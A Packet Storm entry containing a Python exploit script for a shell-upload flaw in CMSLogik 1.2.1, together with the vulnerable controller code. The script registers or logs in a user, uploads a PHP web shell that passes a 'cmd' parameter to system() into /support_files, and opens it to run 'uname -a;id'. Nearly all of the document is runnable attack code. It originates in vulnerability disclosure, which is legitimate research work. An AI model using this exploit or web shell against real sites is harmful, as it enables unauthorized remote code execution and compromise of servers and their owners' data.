CMSLogik 1.2.1 Shell Upload

2013-04-15T00:00:00
ID PACKETSTORM:121305
Type packetstorm
Reporter LiquidWorm
Modified 2013-04-15T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
# CMSLogik 1.2.1 (upload_file_ajax()) Shell Upload Exploit  
#  
#  
# Vendor: ThemeLogik  
# Product web page: http://www.themelogik.com/cmslogik  
# Affected version: 1.2.1 and 1.2.0  
#  
# Summary: CMSLogik is built on a solid & lightweight framework  
# called CodeIgniter, and design powered by Bootstrap. This  
# combination allows for greater security, extensive flexibility,  
# and ease of use. You can use CMSLogik for almost any niche that  
# your project might fall into.  
#  
# Desc: The vulnerability is caused due to the improper verification  
# of uploaded files in '/application/controllers/support.php' script  
# thru the 'upload_file_ajax()' function. This can be exploited to  
# execute arbitrary PHP code by uploading a malicious PHP script file  
# with multiple extensions in the '/support_files' directory. Normal  
# user [level 113] authentication required.  
#  
# ======================================================================  
# /application/controllers/support.php:  
# -------------------------  
#  
# 143: public function upload_file_ajax()  
# 144: {  
# 145: $allowedExtensions = array('jpeg', 'jpg', 'gif', 'png', 'html', 'php', 'js', 'doc', 'docx', 'pdf', 'ppt', 'pps', 'pptx', 'ppsx');  
# 146: $sizeLimit = 10 * 1024;  
# 147: $params = array('extensions' => $allowedExtensions, 'size' => $sizeLimit);  
# 148: $this->load->library('qqfileuploader', $params);  
# 149:  
# 150: $result = $this->qqfileuploader->handleUpload('./support_files');  
# 151:  
# 152: echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);  
# 153: }  
#  
# ======================================================================  
#  
# Tested on: Apache/2.2.22  
# PHP/5.3.15  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2013-5138  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5138.php  
#  
#  
# 05.04.2013  
#  
  
import json, re, sys  
import urllib, urllib2, time  
import cookielib, webbrowser  
  
if len(sys.argv) < 3:  
print '\n\n\x20-\x20\x20[*] Usage: ' +sys.argv[0]+ ' <target> <path>\n'  
print '\n\x20-\x20\x20[*] Example: ' +sys.argv[0]+ ' example.com cmslogik\n'  
sys.exit(0)  
  
host = sys.argv[1]  
path = sys.argv[2]  
  
def reguser():  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
username = raw_input('[+] Enter username [at least 4 characters]: ')  
chk_usr = urllib.urlencode({'user' : username})  
try:  
xhr = json.load(opener.open('http://' +host+ '/' +path+ '/main/unique_username_ajax', chk_usr))  
for key, value in xhr.iteritems():  
fnrand = value  
break  
if fnrand == '1':  
print '[!] The user ' +username+ ' is not available.'  
print '[!] Choose a more unique username please.'  
reguser()  
except:  
print '[!] No connection to host'  
sys.exit(0)  
else:  
print '[*] The user \'' +username+ '\' is available.'  
email = raw_input('[+] Choose e-mail [unique@unique.unique]: ')  
password = raw_input('[+] Choose password [at least 6 characters]: ')  
reg_data = urllib.urlencode({'email' : email,  
'full_name' : 'Patch',  
'password1' : password,  
'password2' : password,  
'r_username' : username,  
'register' : 'Register!'}  
)  
auth = opener.open('http://' +host+ '/' +path+ '/register', reg_data)  
match = auth.read()  
if re.search(r"Sorry but that Email is already in use!", match):  
print '[!] The e-mail you have chosen is already taken. Try again.'  
reguser()  
elif re.search(r"You have been registered", match):  
print '[*] OK.'  
loguser()  
else:  
print '[!] Something is fishy.'  
sys.exit(0)  
  
def loguser():  
print '\n[*] Login please.'  
username = raw_input('\n[+] Enter your username: ')  
password = raw_input('[+] Enter your password: ')  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
login_data = urllib.urlencode({'username' : username,  
'password' : password,  
'login' : 'Login',  
'remember_me' : 'remember'}  
)  
auth = opener.open('http://' +host+ '/' +path+ '/login', login_data)  
match = auth.read()  
if re.search(r"Error!", match):  
print '\n[!] Not logged in! Try again.'  
loguser()  
else:  
print '\n[*] Successfully logged in!'  
print '[*] Uploading malicious php file...'  
time.sleep(3)  
upload_data = '<?php echo \'<pre>\' + system($_GET[\'cmd\']) + \'</pre>\'; ?>'  
xhr2 = json.load(opener.open('http://' +host+ '/' +path+ '//support/upload_file_ajax?qqfile=liwo_sh.php', upload_data))  
for key, value in xhr2.iteritems():  
filename = value  
break  
print '[*] Your shell ID is: ' + filename + '.php'  
time.sleep(2)  
print '[*] Let me open that for ya...'  
time.sleep(2)  
webbrowser.open('http://' +host+ '/' +path+ '/support_files/' +filename+ '.php?cmd=uname -a;id')  
print '\n[*] Zya!'  
sys.exit(0)  
  
def menu():  
print """  
(((((((((((((((((((((((((((((((((((((((((((((((((((  
(( ((  
(( Hello! CMSLogik Shell Upload 0day ((  
(( ((  
(( 1. Register a new User ((  
(( 2. Login with existing User ((  
(( ((  
(((((((((((((((((((((((((((((((((((((((((((((((((((  
  
"""  
n = raw_input('Enter choice number: ');  
if n=='1':  
print '\n[*] Welcome to User Registration!'  
reguser()  
elif n=='2':  
loguser()  
else:  
print '\n[?] Just 1 or 2 please...'  
menu()  
menu()  
`